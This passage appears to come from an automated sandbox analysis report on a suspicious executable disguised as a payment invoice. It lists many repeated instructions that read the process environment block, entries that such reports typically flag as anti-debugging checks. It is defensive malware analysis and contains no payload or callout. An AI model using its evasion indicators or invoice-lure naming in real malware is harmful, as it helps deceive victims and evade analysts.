          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179B1E1 mov eax, dword ptr fs:[00000030h]4_2_0179B1E1
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017931E0 mov eax, dword ptr fs:[00000030h]4_2_017931E0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017915C1 mov eax, dword ptr fs:[00000030h]4_2_017915C1
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A31C1 mov eax, dword ptr fs:[00000030h]4_2_017A31C1
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A31C1 mov eax, dword ptr fs:[00000030h]4_2_017A31C1
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE1B9 mov eax, dword ptr fs:[00000030h]4_2_017BE1B9
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE1B9 mov eax, dword ptr fs:[00000030h]4_2_017BE1B9
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE1B9 mov eax, dword ptr fs:[00000030h]4_2_017BE1B9
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov ecx, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov ecx, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov eax, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov ecx, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov ecx, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov eax, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov ecx, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov ecx, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov eax, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov ecx, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov ecx, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B99BF mov eax, dword ptr fs:[00000030h]4_2_017B99BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C65A0 mov eax, dword ptr fs:[00000030h]4_2_017C65A0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C65A0 mov eax, dword ptr fs:[00000030h]4_2_017C65A0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C65A0 mov eax, dword ptr fs:[00000030h]4_2_017C65A0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CFD9B mov eax, dword ptr fs:[00000030h]4_2_017CFD9B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179519E mov eax, dword ptr fs:[00000030h]4_2_0179519E
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179519E mov ecx, dword ptr fs:[00000030h]4_2_0179519E
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01793591 mov eax, dword ptr fs:[00000030h]4_2_01793591
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C4190 mov eax, dword ptr fs:[00000030h]4_2_017C4190
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792D8A mov eax, dword ptr fs:[00000030h]4_2_01792D8A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792D8A mov eax, dword ptr fs:[00000030h]4_2_01792D8A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792D8A mov eax, dword ptr fs:[00000030h]4_2_01792D8A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792D8A mov eax, dword ptr fs:[00000030h]4_2_01792D8A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792D8A mov eax, dword ptr fs:[00000030h]4_2_01792D8A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CA185 mov eax, dword ptr fs:[00000030h]4_2_017CA185
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BC182 mov eax, dword ptr fs:[00000030h]4_2_017BC182
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CAC7B mov eax, dword ptr fs:[00000030h]4_2_017CAC7B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CAC7B mov eax, dword ptr fs:[00000030h]4_2_017CAC7B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CAC7B mov eax, dword ptr fs:[00000030h]4_2_017CAC7B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB477 mov eax, dword ptr fs:[00000030h]4_2_017BB477
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017D5C70 mov eax, dword ptr fs:[00000030h]4_2_017D5C70
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AFC77 mov eax, dword ptr fs:[00000030h]4_2_017AFC77
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AFC77 mov eax, dword ptr fs:[00000030h]4_2_017AFC77
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AFC77 mov eax, dword ptr fs:[00000030h]4_2_017AFC77
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AFC77 mov eax, dword ptr fs:[00000030h]4_2_017AFC77
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BF86D mov eax, dword ptr fs:[00000030h]4_2_017BF86D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B746D mov eax, dword ptr fs:[00000030h]4_2_017B746D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01795050 mov eax, dword ptr fs:[00000030h]4_2_01795050
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01795050 mov eax, dword ptr fs:[00000030h]4_2_01795050
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01795050 mov eax, dword ptr fs:[00000030h]4_2_01795050
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B0050 mov eax, dword ptr fs:[00000030h]4_2_017B0050
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B0050 mov eax, dword ptr fs:[00000030h]4_2_017B0050
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01797055 mov eax, dword ptr fs:[00000030h]4_2_01797055
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CA44B mov eax, dword ptr fs:[00000030h]4_2_017CA44B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01794439 mov eax, dword ptr fs:[00000030h]4_2_01794439
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C3C3E mov eax, dword ptr fs:[00000030h]4_2_017C3C3E
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C3C3E mov eax, dword ptr fs:[00000030h]4_2_017C3C3E
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C3C3E mov eax, dword ptr fs:[00000030h]4_2_017C3C3E
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AB433 mov eax, dword ptr fs:[00000030h]4_2_017AB433
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AB433 mov eax, dword ptr fs:[00000030h]4_2_017AB433
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AB433 mov eax, dword ptr fs:[00000030h]4_2_017AB433
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA830 mov eax, dword ptr fs:[00000030h]4_2_017BA830
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA830 mov eax, dword ptr fs:[00000030h]4_2_017BA830
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA830 mov eax, dword ptr fs:[00000030h]4_2_017BA830
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA830 mov eax, dword ptr fs:[00000030h]4_2_017BA830
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AB02A mov eax, dword ptr fs:[00000030h]4_2_017AB02A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AB02A mov eax, dword ptr fs:[00000030h]4_2_017AB02A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AB02A mov eax, dword ptr fs:[00000030h]4_2_017AB02A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AB02A mov eax, dword ptr fs:[00000030h]4_2_017AB02A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CBC2C mov eax, dword ptr fs:[00000030h]4_2_017CBC2C
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179F018 mov eax, dword ptr fs:[00000030h]4_2_0179F018
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179F018 mov eax, dword ptr fs:[00000030h]4_2_0179F018
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179E009 mov eax, dword ptr fs:[00000030h]4_2_0179E009
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A8800 mov eax, dword ptr fs:[00000030h]4_2_017A8800
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AFC01 mov eax, dword ptr fs:[00000030h]4_2_017AFC01
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AFC01 mov eax, dword ptr fs:[00000030h]4_2_017AFC01
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AFC01 mov eax, dword ptr fs:[00000030h]4_2_017AFC01
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AFC01 mov eax, dword ptr fs:[00000030h]4_2_017AFC01
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A28FD mov eax, dword ptr fs:[00000030h]4_2_017A28FD
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A28FD mov eax, dword ptr fs:[00000030h]4_2_017A28FD
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A28FD mov eax, dword ptr fs:[00000030h]4_2_017A28FD
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB8E4 mov eax, dword ptr fs:[00000030h]4_2_017BB8E4
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB8E4 mov eax, dword ptr fs:[00000030h]4_2_017BB8E4
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01792CDB mov eax, dword ptr fs:[00000030h]4_2_01792CDB
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017970C0 mov eax, dword ptr fs:[00000030h]4_2_017970C0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017970C0 mov eax, dword ptr fs:[00000030h]4_2_017970C0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CF0BF mov ecx, dword ptr fs:[00000030h]4_2_017CF0BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CF0BF mov eax, dword ptr fs:[00000030h]4_2_017CF0BF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179E8B0 mov eax, dword ptr fs:[00000030h]4_2_0179E8B0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179E8B0 mov eax, dword ptr fs:[00000030h]4_2_0179E8B0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179E8B0 mov eax, dword ptr fs:[00000030h]4_2_0179E8B0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179E8B0 mov eax, dword ptr fs:[00000030h]4_2_0179E8B0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179E8B0 mov eax, dword ptr fs:[00000030h]4_2_0179E8B0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179E8B0 mov eax, dword ptr fs:[00000030h]4_2_0179E8B0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01794CB0 mov eax, dword ptr fs:[00000030h]4_2_01794CB0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A34B1 mov eax, dword ptr fs:[00000030h]4_2_017A34B1
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A34B1 mov eax, dword ptr fs:[00000030h]4_2_017A34B1
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017D90AF mov eax, dword ptr fs:[00000030h]4_2_017D90AF
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A14A9 mov eax, dword ptr fs:[00000030h]4_2_017A14A9
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A14A9 mov ecx, dword ptr fs:[00000030h]4_2_017A14A9
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A28AE mov eax, dword ptr fs:[00000030h]4_2_017A28AE
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A28AE mov eax, dword ptr fs:[00000030h]4_2_017A28AE
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A28AE mov eax, dword ptr fs:[00000030h]4_2_017A28AE
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A28AE mov ecx, dword ptr fs:[00000030h]4_2_017A28AE
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A28AE mov eax, dword ptr fs:[00000030h]4_2_017A28AE
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A28AE mov eax, dword ptr fs:[00000030h]4_2_017A28AE
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A38A4 mov eax, dword ptr fs:[00000030h]4_2_017A38A4
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A38A4 mov ecx, dword ptr fs:[00000030h]4_2_017A38A4
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A849B mov eax, dword ptr fs:[00000030h]4_2_017A849B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179EC9B mov eax, dword ptr fs:[00000030h]4_2_0179EC9B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179EC9B mov eax, dword ptr fs:[00000030h]4_2_0179EC9B
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01799080 mov eax, dword ptr fs:[00000030h]4_2_01799080
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01791480 mov eax, dword ptr fs:[00000030h]4_2_01791480
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C3B7A mov eax, dword ptr fs:[00000030h]4_2_017C3B7A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C3B7A mov eax, dword ptr fs:[00000030h]4_2_017C3B7A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AF370 mov eax, dword ptr fs:[00000030h]4_2_017AF370
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AF370 mov eax, dword ptr fs:[00000030h]4_2_017AF370
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AF370 mov eax, dword ptr fs:[00000030h]4_2_017AF370
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179DB60 mov ecx, dword ptr fs:[00000030h]4_2_0179DB60
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AFF60 mov eax, dword ptr fs:[00000030h]4_2_017AFF60
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE760 mov eax, dword ptr fs:[00000030h]4_2_017BE760
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BE760 mov eax, dword ptr fs:[00000030h]4_2_017BE760
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179F358 mov eax, dword ptr fs:[00000030h]4_2_0179F358
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C3B5A mov eax, dword ptr fs:[00000030h]4_2_017C3B5A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C3B5A mov eax, dword ptr fs:[00000030h]4_2_017C3B5A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C3B5A mov eax, dword ptr fs:[00000030h]4_2_017C3B5A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C3B5A mov eax, dword ptr fs:[00000030h]4_2_017C3B5A
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CDF4C mov eax, dword ptr fs:[00000030h]4_2_017CDF4C
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179DB40 mov eax, dword ptr fs:[00000030h]4_2_0179DB40
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179F340 mov eax, dword ptr fs:[00000030h]4_2_0179F340
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017AEF40 mov eax, dword ptr fs:[00000030h]4_2_017AEF40
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179A745 mov eax, dword ptr fs:[00000030h]4_2_0179A745
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179E746 mov eax, dword ptr fs:[00000030h]4_2_0179E746
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_0179E746 mov eax, dword ptr fs:[00000030h]4_2_0179E746
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB73D mov eax, dword ptr fs:[00000030h]4_2_017BB73D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BB73D mov eax, dword ptr fs:[00000030h]4_2_017BB73D
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C3F33 mov eax, dword ptr fs:[00000030h]4_2_017C3F33
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01794F2E mov eax, dword ptr fs:[00000030h]4_2_01794F2E
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01794F2E mov eax, dword ptr fs:[00000030h]4_2_01794F2E
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C4710 mov eax, dword ptr fs:[00000030h]4_2_017C4710
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BF716 mov eax, dword ptr fs:[00000030h]4_2_017BF716
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017BA309 mov eax, dword ptr fs:[00000030h]4_2_017BA309
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017CA70E mov eax, dword ptr fs:[00000030h]4_2_017CA70E
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017D37F5 mov eax, dword ptr fs:[00000030h]4_2_017D37F5
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B77F0 mov eax, dword ptr fs:[00000030h]4_2_017B77F0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B77F0 mov eax, dword ptr fs:[00000030h]4_2_017B77F0
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3BF4 mov eax, dword ptr fs:[00000030h]4_2_017A3BF4
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017A3BF4 mov ecx, dword ptr fs:[00000030h]4_2_017A3BF4
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_01791BE9 mov eax, dword ptr fs:[00000030h]4_2_01791BE9
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B97ED mov eax, dword ptr fs:[00000030h]4_2_017B97ED
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B97ED mov eax, dword ptr fs:[00000030h]4_2_017B97ED
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B97ED mov eax, dword ptr fs:[00000030h]4_2_017B97ED
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B97ED mov eax, dword ptr fs:[00000030h]4_2_017B97ED
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B97ED mov eax, dword ptr fs:[00000030h]4_2_017B97ED
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B97ED mov eax, dword ptr fs:[00000030h]4_2_017B97ED
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017B97ED mov eax, dword ptr fs:[00000030h]4_2_017B97ED
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C37EB mov eax, dword ptr fs:[00000030h]4_2_017C37EB
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C37EB mov eax, dword ptr fs:[00000030h]4_2_017C37EB
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C37EB mov eax, dword ptr fs:[00000030h]4_2_017C37EB
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C37EB mov eax, dword ptr fs:[00000030h]4_2_017C37EB
          Source: C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exeCode function: 4_2_017C37EB mov eax, dword ptr fs:[00000030h]4_2_017C37EB
